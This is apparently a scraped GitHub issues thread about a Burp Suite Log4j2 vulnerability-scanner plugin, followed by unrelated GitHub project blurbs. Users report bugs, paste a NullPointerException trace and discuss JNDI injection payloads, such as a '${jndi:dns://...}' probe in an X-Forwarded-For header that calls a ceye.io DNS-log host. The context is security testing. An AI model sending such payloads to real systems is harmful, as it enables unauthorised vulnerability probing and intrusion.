大佬,右键发送log4j2没有反应,看到了您对其他人的回复,测试了您所使用的jdk版本,也存在同样的问题,盼复。
第一个是建议添加一个对请求头的参数都进行测试的功能,因为在使用过程中发现有些请求头并不在选项里面,但是是有漏洞的,比如vulfocus靶场新加了一个x-api-version的请求头存在漏洞,但是插件不扫描。
第二个是判断依据的问题,我在测试靶场这个参数的时候,发现其它参数存在漏洞有dnslog回显,但是响应包是406,结果就不报这个漏洞点。
Hi again
What is the difference between log4j2burpscanner-0.18.3-jdk11.jar and log4j2burpscanner-0.18.3-jdk8.jar
What version is better for Mac if my java version in use is "15.0.1" ?
is it possible instead of ceyedns to make it works with burp collaborator?
Thanks
比如我本地开启了xray的反连,我应该怎么配置响应url那里?
java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.gpz.P(Unknown Source)
at burp.dzg.getHttpService(Unknown Source)
at burp.gn0.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:151)
at burp.cio.a(Unknown Source)
at burp.fjz.a(Unknown Source)
at burp.fjz.a(Unknown Source)
at burp.a_p.a(Unknown Source)
at burp.g8.b(Unknown Source)
at burp.fjz.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addImpl(Container.java:1146)
at java.desktop/javax.swing.JSplitPane.addImpl(JSplitPane.java:1009)
at java.desktop/java.awt.Container.add(Container.java:997)
at java.desktop/javax.swing.JSplitPane.setLeftComponent(JSplitPane.java:453)
at burp.fjo.d(Unknown Source)
at burp.fjo.b(Unknown Source)
at burp.fjo.a(Unknown Source)
at burp.fjo.lambda$layoutInitialised$2(Unknown Source)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.gpz.P(Unknown Source)
at burp.dzg.getHttpService(Unknown Source)
at burp.gn0.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:151)
at burp.cio.a(Unknown Source)
at burp.fjz.a(Unknown Source)
at burp.fjz.a(Unknown Source)
at burp.a_p.a(Unknown Source)
at burp.g8.b(Unknown Source)
at burp.fjz.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addImpl(Container.java:1146)
at java.desktop/javax.swing.JSplitPane.addImpl(JSplitPane.java:1009)
at java.desktop/java.awt.Container.add(Container.java:997)
at java.desktop/javax.swing.JSplitPane.setLeftComponent(JSplitPane.java:453)
at burp.fjo.d(Unknown Source)
at burp.fjo.b(Unknown Source)
at burp.fjo.a(Unknown Source)
at burp.fjo.lambda$layoutInitialised$2(Unknown Source)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
插件现在的X-Forwarded-For的payload是:
X-Forwarded-For: 127.0.0.1,${jndi:dns://14.xxxxxxxxxxx
目前我遇到的情况就是X-Forwarded-For是存在漏洞的,可是添加了“127.0.0.1,”后漏洞测试不成功。
建议变成X-Forwarded-For:payload
直接去除“127.0.0.1,”或者添加多一种情况
0.15 burp第一次加载后dnslog部分dnsldaprmi=dns出现了两次,应该是写重了吧。小问题删掉一个保存就行,就是不知道并存的话优先级最高的是哪个 哈哈
通过logger++观察到 payload 是 %24{jndi:dns://xxxxxx.ceye.io/%20test} 这种形式,在网站上测试漏洞,我把%20去掉,会有回显,加上%20无回显。
%20是本身的设计?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.